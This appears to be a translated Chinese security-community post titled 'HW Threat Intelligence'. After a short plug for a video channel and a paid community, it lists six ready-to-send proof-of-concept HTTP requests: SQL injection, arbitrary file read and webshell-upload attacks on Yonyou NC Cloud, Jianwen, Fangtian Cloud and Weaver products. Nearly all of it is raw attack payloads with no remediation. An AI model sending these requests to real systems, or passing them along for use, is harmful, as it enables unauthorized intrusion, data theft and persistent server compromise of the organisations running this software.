“HW Threat Intelligence”

Seen this? Following costs you nothing, so give it a like and a share. If the write-ups are too dry, search Bilibili for 标松君, where the uploader posts target-practice (boot2root) videos; follow if you find them useful. A quick plug for the knowledge planet 重生者安全 as well: it posts OSCP knowledge points, vehicle/IoV security, penetration testing and red-team material, and bug-hunting tools at irregular intervals every day, so feel free to join. Anyone who wants to hunt SRC logic vulnerabilities can DM me.

01 PoC Intelligence
1. Yonyou NC Cloud (用友NC Cloud) queryStaffByName SQL injection vulnerability

GET /ncchr/pm/staff/queryStaffByName?name=1%27%20AND%201=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--+ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Connection: close
2. Jianwen Engineering Management System (建文工程管理系统) download2 arbitrary file read vulnerability

POST /Common/DownLoad2.aspx HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Content-Length: 28

path=../log4net.config&Name=
3. Fangtian Cloud Smart Platform (方天云智慧平台系统) file upload vulnerability

POST /Upload.ashx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
Connection: close

------WebKitFormBoundarySl8siBbmVicABvTX
Content-Disposition: form-data; name="file"; filename="qwe.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%>
------WebKitFormBoundarySl8siBbmVicABvTX--

The path returned in the response: UploadFile/CustomerFile/
4. Fangtian Cloud Smart Platform (方天云智慧平台系统) GetCustomerLinkman SQL injection vulnerability

POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: application/json

{clmID:"1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QurA"}
5. Weaver E-Bridge (泛微云桥) file upload vulnerability

POST /wxclient/app/recruit/resume/addResume?fileElementId=H HTTP/1.1
Host: 127.0.0.1:8088
Content-Length: 361
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryD5Mawpg068t7pbxZ
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: application/octet-stream

127
------WebKitFormBoundaryD5Mawpg068t7pbxZ
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: application/octet-stream

127
------WebKitFormBoundaryD5Mawpg068t7pbxZ--

Uploaded file location: /upload/202408/{1-2 uppercase letters}/shell.jsp
6. Weaver (泛微) HrmService SQL injection vulnerability

POST /services/HrmService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: close
SOAPAction: urn:weaver.hrm.webservice.HrmService.getHrmDepartmentInfo
Content-Type: text/xml;charset=UTF-8
Host:
Content-Length: 427
X-Forwarded-For: 127.0.0.1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hrm="http://localhost/services/HrmService">
  <soapenv:Header/>
  <soapenv:Body>
    <hrm:getHrmDepartmentInfo>
      <!--type: string-->
      <hrm:in0>gero et</hrm:in0>
      <!--type: string-->
      <hrm:in1>1)AND(db_name()like'ec%'</hrm:in1>
    </hrm:getHrmDepartmentInfo>
  </soapenv:Body>
</soapenv:Envelope>